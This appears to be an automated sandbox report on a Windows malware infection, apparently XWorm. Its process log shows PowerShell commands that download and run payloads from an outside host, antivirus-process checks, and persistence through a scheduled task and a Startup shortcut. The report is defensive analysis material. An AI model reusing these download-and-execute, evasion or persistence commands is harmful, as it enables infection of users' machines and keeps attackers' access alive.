Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell -Command "Invoke-WebRequest -Uri 'https://myguyapp.com/f.pdf' -OutFile 'C:\Users\user\AppData\Local\Temp\f.pdf'"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\f.pdf"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell -Command "Invoke-WebRequest -Uri 'http://myguyapp.com/msword.zip' -OutFile 'C:\Users\user\AppData\Local\Temp\msword.zip'"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c mkdir "C:\Users\user\AppData\Local\Temp\msword"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell -Command "Expand-Archive -Path 'C:\Users\user\AppData\Local\Temp\msword.zip' -DestinationPath 'C:\Users\user\AppData\Local\Temp\msword' -Force"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Users\user\AppData\Local\Temp\msword\msword.exe "C:\Users\user\AppData\Local\Temp\msword\msword.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest -Uri 'https://myguyapp.com/f.pdf' -OutFile 'C:\Users\user\AppData\Local\Temp\f.pdf'"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest -Uri 'http://myguyapp.com/msword.zip' -OutFile 'C:\Users\user\AppData\Local\Temp\msword.zip'"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Expand-Archive -Path 'C:\Users\user\AppData\Local\Temp\msword.zip' -DestinationPath 'C:\Users\user\AppData\Local\Temp\msword' -Force"
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Phpbb Phpbb.bat & Phpbb.bat
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 220239
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "DimPieLilHot" Statistical
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Response + ..\Fires + ..\Automatic F
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\220239\Carter.pif Carter.pif F
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Process created: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Wagner" /tr "wscript //B 'C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js'" /sc minute /mo 5 /F
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr "C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr" "C:\Users\user\AppData\Local\CloudSynergy Solutions\R"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr "C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr" "C:\Users\user\AppData\Local\CloudSynergy Solutions\R"

Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\danielpulse.url" & echo url="c:\users\user\appdata\local\cloudsynergy solutions\danielpulse.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\danielpulse.url" & exit
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\danielpulse.url" & echo url="c:\users\user\appdata\local\cloudsynergy solutions\danielpulse.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\danielpulse.url" & exit

Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif

32_2_00C488CD

Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif

Code function: 32_2_00C54F1C AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

32_2_00C54F1C

Source: msword.exe, 00000016.00000003.2180955166.0000000002996000.00000004.00000020.00020000.00000000.sdmp, Carter.pif, 00000020.00000003.2212880920.0000000003F72000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmp	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: RegAsm.exe, 0000002C.00000002.4145311596.0000000002C64000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002C.00000002.4145311596.0000000002C71000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002C.00000002.4145311596.0000000002C5B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: DanielPulse.scr	Binary or memory string: Shell_TrayWnd
Source: RegAsm.exe, 0000002C.00000002.4145311596.0000000002C64000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002C.00000002.4145311596.0000000002C71000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002C.00000002.4145311596.0000000002C5B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: @\dq@\dq'PING!<Xwormmm>Program Manager<Xwormmm>0
Source: RegAsm.exe, 0000002C.00000002.4145311596.0000000002C5B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $dq'PING!<Xwormmm>Program Manager<Xwormmm>0Tedqd
Source: RegAsm.exe, 0000002C.00000002.4145311596.0000000002C64000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002C.00000002.4145311596.0000000002C71000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002C.00000002.4145311596.0000000002C5B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: PING!<Xwormmm>Program Manager<Xwormmm>0
Source: RegAsm.exe, 0000002C.00000002.4145311596.0000000002C64000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002C.00000002.4145311596.0000000002C71000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002C.00000002.4145311596.0000000002C5B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Managert-dq
Source: RegAsm.exe, 0000002C.00000002.4145311596.0000000002C64000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002C.00000002.4145311596.0000000002C52000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $dq'PING!<Xwormmm>Program Manager<Xwormmm>0Tedq
Source: RegAsm.exe, 0000002C.00000002.4145311596.0000000002C71000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $dq'PING!<Xwormmm>Program Manager<Xwormmm>0Tedq\|!

Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif

Code function: 32_2_00C1885B cpuid

32_2_00C1885B

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation

Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif

Code function: 32_2_00C30030 GetLocalTime,__swprintf,

32_2_00C30030

Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif

Code function: 32_2_00C30722 GetUserNameW,

32_2_00C30722

Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif

Code function: 32_2_00C2416A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

32_2_00C2416A

Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe

Code function: 22_2_00406805 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,

22_2_00406805

Source: C:\Windows\SysWOW64\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: RegAsm.exe, 0000002C.00000002.4144371742.0000000000F95000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

